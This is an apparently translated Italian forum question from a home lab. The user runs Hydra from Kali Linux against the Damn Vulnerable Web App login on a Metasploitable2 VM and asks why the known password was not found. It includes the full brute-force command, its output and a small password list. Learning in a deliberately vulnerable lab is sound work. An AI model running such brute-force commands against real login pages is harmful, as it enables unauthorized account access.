Ho VMware Workstation. Sono in esecuzione Metasploitable2 e Damn Vulnerable Web App. Sto cercando di attaccarlo usando Hydra in Kali Linux. Per risparmiare tempo ho creato un elenco di password molto piccolo e incluso la vera password ( password
).
Ecco il comando e l'output
user1@kali:~$ hydra -l admin -P '/home/user1/Desktop/easy.txt' 192.168.203.131 http-post-form "/dvwa/login.php:username=^USER^&password=^PASS^&Login=Login:Login failed" -V
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2016-03-09 22:03:37
[WARNING] Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have 10 seconds to abort...
[DATA] max 8 tasks per 1 server, overall 64 tasks, 8 login tries (l:1/p:8), ~0 tries per task
[DATA] attacking service http-post-form on port 80
[ATTEMPT] target 192.168.203.131 - login "admin" - pass "aaa" - 1 of 8 [child 0]
[ATTEMPT] target 192.168.203.131 - login "admin" - pass "bbb" - 2 of 8 [child 1]
[ATTEMPT] target 192.168.203.131 - login "admin" - pass "cccc" - 3 of 8 [child 2]
[ATTEMPT] target 192.168.203.131 - login "admin" - pass "ddddd" - 4 of 8 [child 3]
[ATTEMPT] target 192.168.203.131 - login "admin" - pass "eee" - 5 of 8 [child 4]
[ATTEMPT] target 192.168.203.131 - login "admin" - pass "password" - 6 of 8 [child 5]
[ATTEMPT] target 192.168.203.131 - login "admin" - pass "dfsdaf" - 7 of 8 [child 6]
[ATTEMPT] target 192.168.203.131 - login "admin" - pass "23456" - 8 of 8 [child 7]
1 of 1 target completed, 0 valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2016-03-09 22:04:20
Ecco i contenuti di easy.txt (avviso password
è lì)
aaa
bbb
cccc
ddddd
eee
password
dfsdaf
23456
Perché non ha funzionato? Posso accedere manualmente a DVWA usando il nome utente: admin e password: password da un browser web. Anche il comando richiede un paio di minuti per essere completato.